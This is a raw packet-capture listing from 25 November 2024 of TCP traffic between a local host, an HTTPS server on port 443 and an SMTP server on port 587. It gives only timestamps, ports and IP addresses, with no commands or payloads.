                                                                                Nov 25, 2024 14:47:41.743694067 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:41.743709087 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:41.743850946 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:41.747539043 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:41.747556925 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:41.747637033 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:41.747637033 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:41.747654915 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:41.749969959 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:41.751502037 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:41.751518965 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:41.751653910 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:41.751677990 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:41.751842022 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:41.913736105 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:41.913760900 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:41.913855076 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:41.913856030 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:41.913881063 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:41.914230108 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:41.918200016 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:41.918217897 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:41.918312073 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:41.918312073 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:41.918323994 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:41.918657064 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:41.922202110 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:41.922220945 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:41.922312021 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:41.922312021 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:41.922323942 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:41.922370911 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:41.926043987 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:41.926076889 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:41.926186085 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:41.926186085 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:41.926196098 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:41.926275015 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:41.930983067 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:41.931000948 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:41.931140900 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:41.931150913 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:41.931231976 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:41.935868979 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:41.935883045 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:41.936001062 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:41.936001062 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:41.936011076 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:41.936774015 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:41.939374924 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:41.939392090 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:41.939652920 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:41.939661980 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:41.939882994 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:41.944106102 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:41.944123983 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:41.944202900 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:41.944202900 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:41.944212914 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:41.944313049 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:42.105770111 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:42.105787992 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:42.105855942 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:42.105882883 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:42.105895996 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:42.105948925 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:42.110738039 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:42.110753059 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:42.110846043 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:42.110857010 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:42.112690926 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:42.114396095 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:42.114412069 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:42.114468098 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:42.114479065 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:42.114537001 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:42.119082928 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:42.119098902 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:42.119169950 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:42.119182110 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:42.119225979 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:42.119236946 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:42.123085976 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:42.123101950 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:42.123172998 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:42.123184919 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:42.123230934 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:42.124305964 CET49743587192.168.2.4162.254.34.31
                                                                                Nov 25, 2024 14:47:42.127640963 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:42.127655983 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:42.127712011 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:42.127724886 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:42.127752066 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:42.127773046 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:42.131376982 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:42.131396055 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:42.131485939 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:42.131498098 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:42.133871078 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:42.136135101 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:42.136152983 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:42.136213064 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:42.136225939 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:42.137870073 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:42.244204998 CET58749743162.254.34.31192.168.2.4
                                                                                Nov 25, 2024 14:47:42.245933056 CET49743587192.168.2.4162.254.34.31
                                                                                Nov 25, 2024 14:47:42.312597990 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:42.312618971 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:42.312724113 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:42.312750101 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:42.313867092 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:42.316452980 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:42.316469908 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:42.316530943 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:42.316540956 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:42.317863941 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:42.320339918 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:42.320357084 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:42.320401907 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:42.320410967 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:42.320425987 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:42.320449114 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:42.325090885 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:42.325107098 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:42.325196981 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:42.325206995 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:42.325862885 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:42.329062939 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:42.329080105 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:42.329149961 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:42.329159975 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:42.329880953 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:42.333540916 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:42.333558083 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:42.333625078 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:42.333636045 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:42.333869934 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:42.336479902 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:42.336523056 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:42.336550951 CET44349739172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:42.336561918 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:42.336602926 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:42.387610912 CET49739443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:43.534679890 CET58749743162.254.34.31192.168.2.4
                                                                                Nov 25, 2024 14:47:43.534954071 CET49743587192.168.2.4162.254.34.31
                                                                                Nov 25, 2024 14:47:43.654963970 CET58749743162.254.34.31192.168.2.4
                                                                                Nov 25, 2024 14:47:44.193017960 CET58749743162.254.34.31192.168.2.4
                                                                                Nov 25, 2024 14:47:44.194449902 CET49743587192.168.2.4162.254.34.31
                                                                                Nov 25, 2024 14:47:44.320883989 CET58749743162.254.34.31192.168.2.4
                                                                                Nov 25, 2024 14:47:44.320936918 CET49743587192.168.2.4162.254.34.31
                                                                                Nov 25, 2024 14:47:44.326555967 CET58749743162.254.34.31192.168.2.4
                                                                                Nov 25, 2024 14:47:44.609549999 CET58749743162.254.34.31192.168.2.4
                                                                                Nov 25, 2024 14:47:44.609915972 CET49743587192.168.2.4162.254.34.31
                                                                                Nov 25, 2024 14:47:44.729998112 CET58749743162.254.34.31192.168.2.4
                                                                                Nov 25, 2024 14:47:45.047142982 CET58749743162.254.34.31192.168.2.4
                                                                                Nov 25, 2024 14:47:45.047409058 CET49743587192.168.2.4162.254.34.31
                                                                                Nov 25, 2024 14:47:45.167340040 CET58749743162.254.34.31192.168.2.4
                                                                                Nov 25, 2024 14:47:45.450973988 CET58749743162.254.34.31192.168.2.4
                                                                                Nov 25, 2024 14:47:45.452688932 CET49743587192.168.2.4162.254.34.31
                                                                                Nov 25, 2024 14:47:45.572860003 CET58749743162.254.34.31192.168.2.4
                                                                                Nov 25, 2024 14:47:45.865268946 CET58749743162.254.34.31192.168.2.4
                                                                                Nov 25, 2024 14:47:45.865684986 CET49743587192.168.2.4162.254.34.31
                                                                                Nov 25, 2024 14:47:45.985899925 CET58749743162.254.34.31192.168.2.4
                                                                                Nov 25, 2024 14:47:46.266216040 CET58749743162.254.34.31192.168.2.4
                                                                                Nov 25, 2024 14:47:46.266899109 CET49743587192.168.2.4162.254.34.31
                                                                                Nov 25, 2024 14:47:46.266952991 CET49743587192.168.2.4162.254.34.31
                                                                                Nov 25, 2024 14:47:46.266952991 CET49743587192.168.2.4162.254.34.31
                                                                                Nov 25, 2024 14:47:46.269850016 CET49743587192.168.2.4162.254.34.31
                                                                                Nov 25, 2024 14:47:46.387003899 CET58749743162.254.34.31192.168.2.4
                                                                                Nov 25, 2024 14:47:46.387008905 CET58749743162.254.34.31192.168.2.4
                                                                                Nov 25, 2024 14:47:46.387109995 CET58749743162.254.34.31192.168.2.4
                                                                                Nov 25, 2024 14:47:46.389736891 CET58749743162.254.34.31192.168.2.4
                                                                                Nov 25, 2024 14:47:46.782505989 CET58749743162.254.34.31192.168.2.4
                                                                                Nov 25, 2024 14:47:46.828717947 CET49743587192.168.2.4162.254.34.31
                                                                                Nov 25, 2024 14:47:49.785820961 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:49.785845041 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:49.789892912 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:49.810380936 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:49.810396910 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:51.084037066 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:51.084131002 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:51.116174936 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:51.116195917 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:51.116631031 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:51.156869888 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:51.341885090 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:51.383330107 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.047278881 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.047378063 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.047409058 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.047440052 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.047465086 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.047472954 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.047488928 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.047501087 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.047585964 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.047591925 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.055757999 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.056091070 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.056098938 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.070693970 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.072078943 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.072093010 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.125603914 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.167928934 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.219341040 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.219363928 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.255193949 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.255227089 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.255294085 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.255327940 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.255373001 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.260265112 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.268357992 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.268467903 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.268522024 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.268531084 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.268574953 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.276374102 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.284487963 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.288001060 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.288027048 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.292485952 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.292566061 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.292627096 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.292635918 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.292684078 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.300468922 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.308645010 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.308705091 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.308717966 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.315326929 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.315381050 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.315387011 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.321882963 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.321949005 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.321954966 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.335032940 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.335093975 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.335100889 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.341883898 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.341922998 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.341954947 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.341969013 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.342014074 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.449506998 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.451881886 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.451980114 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.451993942 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.456583977 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.459930897 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.459942102 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.465940952 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.466000080 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.466015100 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.466053009 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.475090027 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.475096941 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.475174904 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.479681969 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.479744911 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.488245010 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.488301992 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.496808052 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.496869087 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.501235008 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.501288891 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.505671024 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.505731106 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.514436007 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.514493942 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.518583059 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.527297020 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.527347088 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.527353048 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.527371883 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.527399063 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.536057949 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.536111116 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.536118031 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.536165953 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.540489912 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.540554047 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.651503086 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.651576996 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.658345938 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.658402920 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.661765099 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.661830902 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.668339968 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.668395996 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.674638987 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.674698114 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.677802086 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.677851915 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.680821896 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.680881977 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.686969995 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.687043905 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.693140030 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.693211079 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.696559906 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.696619987 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.702557087 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.702616930 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.708631039 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.708693981 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.715681076 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.715747118 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.718158960 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.718216896 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.724071026 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.724128962 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.728789091 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.728848934 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.734904051 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.734983921 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.738163948 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.738228083 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.744517088 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.744580030 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.750653028 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.750710011 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.753633976 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.753689051 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.759808064 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.759865046 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.852168083 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.852247000 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.856492043 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.856573105 CET49747443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:52.861253023 CET44349747172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:52.861335039 CET49747443192.168.2.4172.67.129.178
